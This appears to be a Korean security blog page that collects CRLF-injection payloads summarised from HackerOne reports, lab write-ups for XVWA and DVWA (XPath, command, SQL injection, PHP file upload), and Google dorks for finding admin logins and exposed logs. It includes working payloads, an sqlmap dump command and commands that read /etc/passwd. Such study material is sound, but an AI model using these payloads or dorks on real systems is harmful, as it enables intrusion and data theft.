기본 콘텐츠로 건너뛰기

HackerOne Vulnerability Analysis

HackerOne Vulnerability Analysis 1

이 문서는  HackerOne 에서  제출된 많은 보고서들을 토대로 핵심 Payload만 요약하여 직접 작성하였습니다. Link :  https://hackerone.com/ Vulnerabilities list 1. CRLF Injection 2. Open Redirection  3. Cross-Site-Scripting 4. SQL-Injection 5. Path Traversal  CRLF Injection PoC http://www.myshopify.com/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com; https://www.blackfan.myshopify.com/xxx%0aSet-Cookie:test=test2;domain=.myshopify.com; HTTP Response: HTTP/1.1 302 Moved Temporarily ... Location: http://myshopify.com/xxcrlftest Set-Cookie:test=test;domain=.myshopify.com; PoC: https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com HTTP Response: HTTP/1.1 301 Moved Permanently ... Location: http://engineeringblog.yelp.com/xxcrlftest Set-Cookie: test=test;domain=.yelp.com PoC (Chrome, Internet Explorer) http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; HTTP Response: Location: h
최근 글

test

* 39.117.243.43 * | Home | Profile | Linux | 자료실 | zabbix | Mysql 5.6 | 갤러리 | 성경검색 | 해피니스 | 자유게시판 | 게시물검색 | L | O | R | [기초강좌] 구글 검색 옵션 작성자 : rootmanDate : 2007-02-07 09:39 | Hit : 729,786 --------------------------------------------- facebook 관련글 검색 --------------------------------------------- 키워드 + space + site:facebook.com 키워드 + spcae + site:facebook.com/pages 키워드 + spcae + site:facebook.com/group 키워드 + spcae + site:facebook.com/profile --------------------------------------------- 로그 파일 --------------------------------------------- db filetype:log intitle:"index of" intext:(backup|백업|bak|dump) --------------------------------------------- 로그인 --------------------------------------------- 로그인 inurl:/admin filetype:php inurl:/admin filetype:asp "VNC Desktop" inurl:5800 intitle:"원격 데스크톱 웹 연결" inurl:tsweb intitle:관리자 로그인 intitle:"인트라넷" intitle:"intranet" intitle:"직원용 intitle:"사내" intext:로그인" ---

Hackerone XSS

XVWA Xpath Injection

XVWA Xpath I njection [그림 1] Summary [그림1]  는  Xpath Injection  공격을 시도해 볼 수 있도록 개발된 폼을 제공하고 있습니다. Description ' or substring(name(parent::*[position()=1]),1,1)='A ' or substring(name(parent::*[position()=1]),1,1)='B ' or substring(name(parent::*[position()=1]),1,1)='C 노드 대입을 통한 결과 다음과 같이 Xpath 에 취약한 결과가 나오는것을 확인할수있습니다. ' or '1'='1  주입결과. Steps to reproduce 1. ' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' Source Code Impact 공격자는 Xpath Query 주입을 통해  액세스 할 수없는 데이터에 접근할수있습니다.

XVWA OS Command Injection

XVWA OS Command Injection [그림 1] Summary [그림1]  는  Command Injection  공격을 시도해 볼 수 있도록 개발된 폼을 제공하고 있습니다. Description [그림 1]  에서는 #,&.;,|,*,? 등 특수문자에 대한 필터링이 존재하지 않아 리눅스 명령어 사용이 가능합니다. 따라서 공격자는 리눅스 명령어를 통해 Command Injection 공격을 수행할수있습니다. Steps to reproduce 입력폼에 다음 명령어를 입력하십시오.  ;ls  | cat /etc/passwd Impact Command Injection 수행 가능.

XVWA SQLInjection

XVWA  SQLinjection [그림 1] Summary [그림1] 는 SQL Injection 공격을 시도해 볼 수 있도록 개발된 폼을 제공하고 있습니다. Description [그림 1] 에서 Search 입력 폼에 ' or 1=1 -- 입력 시 특수문자에 대한 필터링이 존재하지 않아 SQLInjection 에 취약한 결과가 나오는것을 확인이 가능합니다. UNION SQLInjection 1' AND 1=0 UNION ALL SELECT 1,@@version,database(),@@datadir,5,6,7# Steps to reproduce 1. 임의의 문자열을 입력 후 Submit 을 누르는 동시에 패킷을 캡쳐합니다. 패킷을 캡처한 이유는 GET 통신이 아닌 POST 방식을 통해 데이터가 현재 전달되고있으므로 패킷을 통해 Body 데이터 정보의 매개변수를 확인하기 위해서입니다. 2. 캡쳐한 패킷은 다음과 같습니다. 3.  sqlmap -u "http://192.168.56.109/xvwa/vulnerabilities/sqli_blind/" --data "item=&search=1234 " -p search --dump 4. password 로 크랙되어있는 문자열들은 다음 사이트를 통해 크랙이 가능합니다. https://www.onlinehashcrack.com/hash-identification.php   Impact 공격자는 SQL Injection 을 통해 데이터베이스 계정정보를 획득할수있습니다.

DVWA SQL Injection

DVWA  SQL Injection low [그림 1] Summary [그림1] 는 SQLInjection 공격을 시도해 볼 수 있도록 개발된 폼을 제공하고 있습니다 Description [그림 1] 은 ' , # , -- ,= 등 SQLInjection 에 취약한 특수문자등을 필터링하지 않아 SQL주입이 가능합니다. Steps to reproduce ORDER BY Query 1' order by 1,2# User ID:    ID: 1' ORDER BY 1,2# First name: admin Surname: admin UNION Query ' UNION SELECT 1,@@version#  User ID:    ID: 1' UNION SELECT 1,version()# First name: admin Surname: admin ID: 1' UNION SELECT 1,version()# First name: 1 Surname: 10.4.8-MariaDB ' UNION ALL SELECT 1,column_name from information_schema.columns# User ID:    ID: ' UNION ALL SELECT 1,column_name from information_schema.columns# First name: 1 Surname: user_id ID: ' UNION ALL SELECT 1,column_name from information_schema.columns# First name: 1 Surname: first_name ID: ' UNION ALL SELECT 1,column_name from information_schema.columns# First name: 1 Surname: last_name ID: ' UNION ALL SELECT 1,column_name from in

DVWA File Upload

DVWA  File Upload - low  [그림 1] Summary [그림1] 는 File upload 공격을 시도해 볼 수 있도록 개발된 폼을 제공하고 있습니다. Description [그림 1] 은 확장자 검사 등 보호대책이 적용되어 있지 않아 PHP 파일업로드가 가능합니다. Choose an image to upload: ../../hackable/uploads/file upload.php succesfully uploaded! php 파일 업로드시 성공적으로 업로드가 가능하며 위와 같이  ../../hackable/uploads/file upload.php   업로드한 php 파일 경로 확인이 가능합니다. Steps to reproduce 1. 다음과 같은 PHP 파일을 만듭니다. <?       system('cat /etc/passwd'); ?> 2. 파일 선택을 누르고 PHP 파일을 업로드합니다. 3. 업로드한 주소인 http://localhost/hackable/uploads/file upload.php 주소로 이동합니다. Impact 공격자는 PHP 파일업로드를 통한 서버 장악이 가능합니다. 이는 원격코드실행취약점으로도 이뤄질수있습니다.